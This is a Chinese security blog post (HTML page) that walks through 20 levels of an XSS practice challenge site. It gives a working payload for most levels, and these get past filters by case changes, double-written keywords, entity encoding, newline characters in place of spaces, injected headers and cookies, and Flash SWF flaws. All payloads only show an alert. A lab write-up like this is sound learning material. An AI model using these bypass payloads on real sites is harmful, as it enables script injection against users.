<!doctype html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />












  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.0" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="bypass,xss," />





  <link rel="alternate" href="/atom.xml" title="SuNu11'Blog" type="application/atom+xml" />




  <link rel="shortcut icon" type="image/x-icon" href="/images/w.ico?v=5.1.0" />






<meta name="description" content="接着上一文过来，这一部分是第二个环境的做题记录。">
<meta name="keywords" content="bypass,xss">
<meta property="og:type" content="article">
<meta property="og:title" content="我与XSS的感情之路(2)">
<meta property="og:url" content="http://sunu11.com/2017/07/23/13/index.html">
<meta property="og:site_name" content="SuNu11&#39;Blog">
<meta property="og:description" content="接着上一文过来，这一部分是第二个环境的做题记录。">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://n-b.oss-cn-beijing.aliyuncs.com/q-13.png">
<meta property="og:image" content="http://n-b.oss-cn-beijing.aliyuncs.com/q-14.png">
<meta property="og:image" content="http://n-b.oss-cn-beijing.aliyuncs.com/q-15.png">
<meta property="og:image" content="http://n-b.oss-cn-beijing.aliyuncs.com/q-16.png">
<meta property="og:updated_time" content="2018-11-03T11:56:48.470Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="我与XSS的感情之路(2)">
<meta name="twitter:description" content="接着上一文过来，这一部分是第二个环境的做题记录。">
<meta name="twitter:image" content="http://n-b.oss-cn-beijing.aliyuncs.com/q-13.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    sidebar: {"position":"left","display":"post"},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: 'undefined',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://sunu11.com/2017/07/23/13/"/>





  <title> 我与XSS的感情之路(2) | SuNu11'Blog </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  








  <div style="display: none;">
    <script src="//s95.cnzz.com/z_stat.php?id=1275798487&web_id=1275798487" language="JavaScript"></script>
  </div>





  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-meta ">
  

  <div class="custom-logo-site-title">
    <a href="/"  class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">SuNu11'Blog</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
  <p class="site-subtitle"></p>
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/index.html" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/index.html" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/index.html" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/index.html" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-guide">
          <a href="/Guide/index.html" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-calendar"></i> <br />
            
            航海图
          </a>
        </li>
      
        
        <li class="menu-item menu-item-commonweal">
          <a href="/404.html" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            公益404
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
  <link itemprop="mainEntityOfPage" href="http://sunu11.com/2017/07/23/13/">

  <span style="display:none" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="name" content="SuNu11">
    <meta itemprop="description" content="">
    <meta itemprop="image" content="/images/me.png">
  </span>

  <span style="display:none" itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="SuNu11'Blog">
    <span style="display:none" itemprop="logo" itemscope itemtype="http://schema.org/ImageObject">
      <img style="display:none;" itemprop="url image" alt="SuNu11'Blog" src="">
    </span>
  </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                我与XSS的感情之路(2)
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2017-07-23T11:43:55+08:00">
                2017-07-23
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
              <span class="post-meta-divider">|</span>
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/WEB安全/" itemprop="url" rel="index">
                    <span itemprop="name">WEB安全</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          

          
          

          

          

        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>接着上一文过来，这一部分是第二个环境的做题记录。<a id="more"></a></p>
<h2 id="平台2-xsqler-win"><a href="#平台2-xsqler-win" class="headerlink" title="平台2 xsqler.win"></a>平台2 <a href="http://sqler.win/xss/index.php" target="_blank" rel="external">xsqler.win</a></h2><p><strong><em>Stage#1: <a href="http://sqler.win/xss/level1.php?name=test" target="_blank" rel="external">http://sqler.win/xss/level1.php?name=test</a></em></strong><br>本关简单，使用svg\body\style \ iframe等标签均可过关。<br>payload: <code>http://sqler.win/xss/level1.php?name=test&lt;body/onload=alert(1)&gt;</code></p>
<p><strong><em>Stage#2: <a href="http://sqler.win/xss/level2.php?keyword=test" target="_blank" rel="external">http://sqler.win/xss/level2.php?keyword=test</a></em></strong><br>本题与第一题差不多，只需要进行标签的闭合即可。<br>payload:<br><code>http://sqler.win/xss/level2.php?keyword=test&quot;&gt;&lt;body/onload=alert(1)&gt;</code></p>
<p><strong><em>Stage#3：<a href="http://sqler.win/xss/level3.php?writing=wait" target="_blank" rel="external">http://sqler.win/xss/level3.php?writing=wait</a></em></strong><br>本题通过测试，可得知过滤了&lt;&gt;，且只能用’闭合标签。于是采用on事件型如onmouseover、onmouseout、onclick等进行绕过。Payload: <code>&#39;onmouseover=&#39;alert(1)</code></p>
<p><strong><em>Stage#4: <a href="http://sqler.win/xss/level4.php?keyword=" target="_blank" rel="external">http://sqler.win/xss/level4.php?keyword=</a></em></strong><br>本题与上题类似，使用”闭合标签即可：payload：<code>&quot;onmouseover=&#39;alert(1)’</code></p>
<p><img src="http://n-b.oss-cn-beijing.aliyuncs.com/q-13.png" alt="图13"></p>
<p><strong><em>Stage#5: <a href="http://sqler.win/xss/level5.php?keyword=find" target="_blank" rel="external">http://sqler.win/xss/level5.php?keyword=find</a> a way out! </em></strong><br>本题比较简单，增加了过滤范围，on-&gt;o_n 然后需要闭合。可以使用<code>&quot;&gt;&lt;a href=javascript:alert(1)&gt;</code>通过点击出现的链接进行通关。</p>
<p><strong><em>Stage#6: <a href="http://sqler.win/xss/level6.php?keyword=break" target="_blank" rel="external">http://sqler.win/xss/level6.php?keyword=break</a> it out! </em></strong><br>随便哪一个试一下，处理掉了src、herf、onxxx、等，需要进行绕过，通过大小写，成功绕过payload：<code>&quot;&gt;&lt;a HRef=javascript:alert(1)&gt;</code></p>
<p><strong><em>Stage#7: <a href="http://sqler.win/xss/level7.php?keyword=move" target="_blank" rel="external">http://sqler.win/xss/level7.php?keyword=move</a> up! </em></strong><br>本题对输入的script、on等进行了单层过滤，可以使用其过滤不严，采用此类payload绕过即可：<code>&lt;svg/oonnload=alert(1)&gt;、或者将script写成scrscriptipt</code>的方式构造即可。</p>
<p><strong><em>Stage#8:<a href="http://sqler.win/xss/level7.php?keyword=move" target="_blank" rel="external">http://sqler.win/xss/level7.php?keyword=move</a> up! </em></strong><br>本题已经给出了一个<a>标签,但是过滤了script、src等，大小写无法绕过，但是可以使用html编码进行绕过payload：<code>javasc&amp;#114;ipt:alert(1)</code></a></p>
<p><strong><em>Stage#9：<a href="http://sqler.win/xss/level9.php?keyword=not" target="_blank" rel="external">http://sqler.win/xss/level9.php?keyword=not</a> bad! </em></strong><br>本题最大的难点在于绕合法连接，发现只有带<code>http://</code>的url才能被认为是合法链接，另外由于“”也被过滤，其他规则与上一关相同，因此需要进行编码。于是构造payload： <code>javascr&amp;#105pt:alert(&amp;#34;http://x&amp;#34;)</code></p>
<p><strong><em>Stage#10：<a href="http://sqler.win/xss/level10.php?keyword=well" target="_blank" rel="external">http://sqler.win/xss/level10.php?keyword=well</a> done! </em></strong><br>本题存在三个隐藏输入框，构造如下get请求，查看元素后，发现t_sort能被写入，如图：<br>get请求：<a href="http://sqler.win/xss/level10.php?t_link=111&amp;t_history=222&amp;t_sort=333" target="_blank" rel="external">http://sqler.win/xss/level10.php?t_link=111&amp;t_history=222&amp;t_sort=333</a></p>
<p><img src="http://n-b.oss-cn-beijing.aliyuncs.com/q-14.png" alt="图14"></p>
<p>因此只需要在该参数处构造跨站脚本语句即可，使用<code>&quot;onmouseover=&#39;alert(1)&#39;</code>然后让输入框属性显示出来改hidden为text即可：payload如下：<br><code>http://sqler.win/xss/level10.php?t_sort=&quot;onmouseover=&#39;alert(1)&#39; type=&#39;text&#39;</code></p>
<p><strong><em>Stage#11：<a href="http://sqler.win/xss/level11.php?keyword=good" target="_blank" rel="external">http://sqler.win/xss/level11.php?keyword=good</a> job! </em></strong><br>通过查看元素，发现t_ref的value是我们这个网页的referer值，抓包修改referer输入xss payload：<code>&quot;onmouseover=&#39;alert(1)&#39; type=&#39;text&#39;</code>即可，本题不想多说什么，感觉referer一般存在xss的极少。</p>
<p><strong><em>Stage#12：<a href="http://sqler.win/xss/level12.php?keyword=good" target="_blank" rel="external">http://sqler.win/xss/level12.php?keyword=good</a> job! </em></strong><br>查看元素可看到t_ua参数的value是User-Agent值，和上一题一样，修改为xss payload即可：<code>&quot;onmouseover=&#39;alert(1)&#39; type=&#39;text&#39;</code></p>
<p><strong><em>Stage#13：<a href="http://sqler.win/xss/level13.php?keyword=good" target="_blank" rel="external">http://sqler.win/xss/level13.php?keyword=good</a> job! </em></strong><br>此题思路同上，这次传参位置为cookie，payload：<code>&quot;onmouseover=&#39;alert(1)&#39; type=&#39;text&#39;；</code>感觉这三题是绕脑洞的样子，，，但是在测试过程中还真没发现过，，，，</p>
<p><strong><em>Stage#14：<a href="http://sqler.win/xss/level14.php" target="_blank" rel="external">http://sqler.win/xss/level14.php</a></em></strong><br>本题可以在查看元素发现嵌入了一个iframe页面，访问该页面是查看图片EXIF信息的，通过看答案知道有EXIF在解析过程中，某些插件在解析时输出未处理可导致xss漏洞，因此食用exiftool工具，修改图片EXIF后，进行上传，然后解析过程中弹窗。学习了，，，， </p>
<p><strong><em>Stage#15：<a href="http://sqler.win/xsschallenge/level15.php?src=1.jpg" target="_blank" rel="external">http://sqler.win/xsschallenge/level15.php?src=1.jpg</a></em></strong><br>本关说是利用src可包含前面页面上的xss漏洞，然后进行弹窗，怎么尝试都没弹出来，，，表示无奈。。。。。</p>
<p><strong><em>Stage#16：<a href="http://sqler.win/xss/level16.php?keyword=" target="_blank" rel="external">http://sqler.win/xss/level16.php?keyword=</a></em></strong><br>本题终于回到常规绕的思路上了，，经过尝试，可以判断过滤了空格，/等符号，然后尝试绕过，很多姿势都不行，包括编码，进制，截断等然后发现换行符可以绕过：%0a、%0d，因此，payload：<br><code>http://sqler.win/xss/level16.php?keyword=&lt;svg%0aonload=alert(1)&gt;</code></p>
<p><strong><em>Stage#17：<a href="http://sqler.win/xss/level17.php?arg01=a&amp;arg02=b" target="_blank" rel="external">http://sqler.win/xss/level17.php?arg01=a&amp;arg02=b</a></em></strong><br>本题比较简单，在arg02参数值中写入事件型payload即可触发，payload:<br><code>http://sqler.win/xss/level17.php? arg02=%20onmousedown=alert(1)</code></p>
<p><strong><em>Stage#18：ttp://sqler.win/xss/level18.php?arg01=a&amp;arg02=b</em></strong><br>本题与上一题相似，但是arg02无法构造出空格，也就没办法写入输出语句，然后试了试arg01，果然换汤不换药，直接写入payload：<code>%20onmousedown=alert(1)</code></p>
<p><strong><em>Stage#19：<a href="http://sqler.win/xss/level19.php?arg01=a&amp;arrg02=b" target="_blank" rel="external">http://sqler.win/xss/level19.php?arg01=a&amp;arrg02=b</a></em></strong><br>右键查看元素可以看到一个swf文件被调用，然后设想为flash xss，通过下载该文件，使用JPEXS进行分析，发现为actionscript 2.0，然后知道actionscript 2.0是有可以使用getURL来执行javascript下面以一个实例来剖析Flash XSS过程。有点拗口，，,然后对应本题，定位geturl函数：</p>
<p><img src="http://n-b.oss-cn-beijing.aliyuncs.com/q-15.png" alt="图15"><br>可以看到在sIFR的内容中当getURL打开时，version是可以传入到loc4中的，因此定位contentIsLink函数：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line"></div><div class="line">function contentIsLink()</div><div class="line">  &#123;</div><div class="line">     return this.content.indexOf(&quot;&lt;a &quot;) == 0 &amp;&amp; (this.content.indexOf(&quot;&lt;a &quot;) == this.content.lastIndexOf(&quot;&lt;a &quot;) &amp;&amp; this.content.indexOf(&quot;&lt;/a&gt;&quot;) == this.content.length - 4);</div><div class="line">  &#125;</div></pre></td></tr></table></figure></p>
<p>然后可以根据contentIsLink函数构造出payload:<br><code>http://sqler.win/xss/level19.php?arg01=version&amp;arg02=%3Ca%20href=%22javascript:alert(1)%22%3E1%3C/a%3E</code></p>
<p><strong><em>Stage#20：<a href="http://sqler.win/xss/level20.php?arg01=a&amp;arg02=b" target="_blank" rel="external">http://sqler.win/xss/level20.php?arg01=a&amp;arg02=b</a></em></strong><br>本题个人感觉比上一题容易做出来，，下载swf文件使用JPEXS进行分析后可以发现是zeroclipboard.swf，然后百度一发，<a href="http://www.freebuf.com/sectool/108568.html" target="_blank" rel="external">freebuf</a>第一个，粘贴即可payload：<br><code>http://sqler.win/xss/xsf04.swf?id=\%22))}catch(e){(alert)(/XSS/.source);}//&amp;width=500&amp;height=500</code><br><img src="http://n-b.oss-cn-beijing.aliyuncs.com/q-16.png" alt="图16"></p>

      
    </div>
    <div>
      
        <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束<i class="fa fa-paw"></i>感谢您的阅读-------------</div>
    
</div>
      
    </div> 
    <div>
      
        

      
    </div>

    <div>
      
        
  <div align="center">
 
   <div class="">
   <p><span>
   <br/><br/><b>本文出处：</b><a href="/2017/07/23/13/" title="我与XSS的感情之路(2)">http://sunu11.com/2017/07/23/13/</a><br/><span><span><span><span><span><span><b>本文基于：</b><a target="_blank" title="Creative Commons Attribution-ShareAlike 4.0 International (CC BY-SA 4.0)" href="http://creativecommons.org/licenses/by-sa/4.0/"> 知识共享署名-相同方式共享 4.0 </a>国际许可协议发布，欢迎转载，演绎或用于商业目的。但是必须保留本文的署名<a href="http://www.sunu11.com/">sunu11</a>及链接。
   </span></p>
   </div>
 
  </div>
  <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
    <div>坚持原创技术分享，您的支持将鼓励我继续创作！</div>
    <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
      <span>赏</span>
    </button>
    <div id="QR" style="display: none;">
      
      
        <div id="alipay" style="display: inline-block">
          <img id="alipay_qr" src="/images/alipay.png" alt="SuNu11 Alipay"/>
          <p>支付宝打赏</p>
        </div>
      
    </div>
  </div>


      
    </div>


    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/bypass/" rel="tag"><i class="fa fa-tag"></i> bypass</a>
          
            <a href="/tags/xss/" rel="tag"><i class="fa fa-tag"></i> xss</a>
          
        </div>
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/07/20/12/" rel="next" title="我与XSS的感情之路(1)">
                <i class="fa fa-chevron-left"></i> 我与XSS的感情之路(1)
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/08/28/14/" rel="prev" title="我与XSS的感情之路(3)">
                我与XSS的感情之路(3) <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
  </div>
    

        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/me.png"
               alt="SuNu11" />
          <p class="site-author-name" itemprop="name">SuNu11</p>
          <p class="site-description motion-element" itemprop="description">淡泊以明志，宁静以致远</p>
        </div>
        <nav class="site-state motion-element">
          <div class="site-state-item site-state-posts">
            <a href="/archives/index.html">
              <span class="site-state-item-count">32</span>
              <span class="site-state-item-name">日志</span>
            </a>
          </div>

          
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">8</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">43</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        
          <div class="feed-link motion-element">
            <a href="/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="http://mooder.f4ck0.com:8000/" target="_blank" title="Team Spaces">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  Team Spaces
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="https://github.com/sunu11" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://weibo.com/sunu11" target="_blank" title="微博">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  微博
                </a>
              </span>
            
          
        </div>

        
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              一路认识的师傅们
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.sec-redclub.com/" title="Redbu11" target="_blank">Redbu11</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://dbqf.xyz/" title="大兄弟独步清风" target="_blank">大兄弟独步清风</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.virzz.com/" title="V神Virink" target="_blank">V神Virink</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.monburan.cn/" title="大兄弟Monburan" target="_blank">大兄弟Monburan</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.cnblogs.com/n1ghtwatcher/" title="老哥n1ghtwatcher" target="_blank">老哥n1ghtwatcher</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.glamor.site/" title="大诏glamor" target="_blank">大诏glamor</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://www.cnblogs.com/piaomiaohongchen/" title="超神哥" target="_blank">超神哥</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://qclover.cn" title="华清Qclover" target="_blank">华清Qclover</a>
                </li>
              
            </ul>
          </div>
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#平台2-xsqler-win"><span class="nav-number">1.</span> <span class="nav-text">平台2 xsqler.win</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy;  2016 - 
  <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">SuNu11</span>
</div>


<div class="powered-by">
  由 <a>Hexo</a>&nbsp&nbsp&nbsp&nbsp<a href="http://www.miitbeian.gov.cn" target="_blank" title="备案信息">京ICP备16045158号</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Mist
  <script src="https://s96.cnzz.com/z_stat.php?id=1275798487&web_id=1275798487" language="JavaScript"</script>
   </span>
  </a>
</div>
<br>


        

        
      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
    </div>
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  



  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.0"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.0"></script>



  



  




	




  
  

  

  

  

  

  
  
  

  <div style="display: none;">
    <script src="//s95.cnzz.com/z_stat.php?id=1275798487&web_id=1275798487" language="JavaScript"></script>
  </div>



  <script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
  
  <!-- 页面点击小红心 -->
  <script type="text/javascript" src="/js/src/love.js"></script>

  
  
</body>
</html>
